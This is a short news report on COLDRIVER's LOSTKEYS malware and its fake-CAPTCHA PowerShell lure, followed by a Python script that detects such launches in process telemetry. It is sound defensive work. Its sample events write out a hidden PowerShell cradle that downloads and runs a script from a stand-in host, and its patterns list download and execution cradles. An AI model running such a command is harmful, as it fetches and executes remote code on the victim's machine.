Western organizations have been targeted by Russian hacking group COLDRIVER in attacks involving the novel LOSTKEYS information-stealing malware, indicating the threat operation's advancement beyond spear-phishing activities, according to Cointelegraph. COLDRIVER begins intrusions by directing targets to a website displaying a bogus CAPTCHA, which lures them into downloading a PowerShell script that performs device-evasion checks before the eventual installation of LOSTKEYS, a report from Google revealed. Aside from exfiltrating files from specified extensions and directories, LOSTKEYS also sends system and running-process details to COLDRIVER, Google said, adding that it has already included the affected websites in its Safe Browsing feature to prevent further compromise. The development comes after cryptocurrency cybersecurity firm Hacken reported that total cryptocurrency losses reached $2 billion during the first three months of 2025, more than in the whole of last year. Most of the losses have been attributed to the Lazarus Group attack against Dubai-based cryptocurrency exchange Bybit Technology in February.
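The fake-CAPTCHA lure described above ends with a user launching PowerShell from a browser or shell session, which is something a defender can hunt for in process-creation telemetry. The script below is an added detection example, not code from Google's report or from Cointelegraph: it scores PowerShell launches by a handful of indicators (stealth flags, download and execution cradles, encoded commands, a script run from a Downloads or Temp folder) and flags those whose parent is a browser or explorer.exe. The event field names follow Sysmon Event ID 1 conventions, the sample events are constructed, and the indicator names and thresholds are this example's own assumptions.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example; event records are constructed and field names assume a
Sysmon Event ID 1 layout (Image, ParentImage, CommandLine, ProcessId).
"""
import re

# Parents that mean a human (not a service) launched the process; an assumption
# about where a fake-CAPTCHA lure ends up executing its PowerShell stage.
INTERACTIVE_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# (indicator name, regex). Names are this example's own, not a vendor taxonomy.
INDICATORS = [
    ("stealth_flags", re.compile(
        r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|noni(?:nteractive)?\b"
        r"|ep\s+bypass|executionpolicy\s+bypass)", re.I)),
    ("download_cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod"
        r"|\biwr\b|\birm\b|Start-BitsTransfer", re.I)),
    ("exec_cradle", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("encoded_command", re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("script_in_download_dir", re.compile(
        r"\\(?:Downloads|Temp)\\[^\s'\"]+\.ps1", re.I)),
]

# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    {   # browser -> hidden PowerShell pulling and running a remote script
        "ProcessId": 4412,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r"powershell.exe -w hidden -nop -c IEX (New-Object Net.WebClient)"
                       r".DownloadString('http://captcha-check.invalid/verify.ps1')",
    },
    {   # explorer -> PowerShell running a downloaded 'CAPTCHA' script
        "ProcessId": 5120,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass "
                       r"-File C:\Users\alice\Downloads\CAPTCHA_verify.ps1",
    },
    {   # scheduled admin task: one indicator, service parent, should not fire
        "ProcessId": 2208,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\ProgramData\Backup\nightly.ps1",
    },
    {   # not PowerShell at all
        "ProcessId": 6004,
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r"notepad.exe C:\Users\alice\Downloads\notes.txt",
    },
]


def _basename(path):
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def indicators(cmdline):
    """Names of the indicators that match a command line, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def find_suspicious(events, min_indicators=2):
    """Return PowerShell launches from an interactive parent with >= min_indicators hits."""
    hits = []
    for ev in events:
        if _basename(ev["Image"]) not in POWERSHELL_IMAGES:
            continue
        parent = _basename(ev["ParentImage"])
        reasons = indicators(ev["CommandLine"])
        if parent in INTERACTIVE_PARENTS and len(reasons) >= min_indicators:
            hits.append({"ProcessId": ev["ProcessId"], "parent": parent, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"PID {hit['ProcessId']} parent={hit['parent']} reasons={hit['reasons']}")
```

The parent-process condition is what keeps legitimate automation (the services.exe-spawned backup task) out of the results; the indicator threshold keeps a lone `-NoProfile` from paging anyone. Tune both against your own baseline before deploying, since help-desk tooling that runs PowerShell from explorer.exe is common.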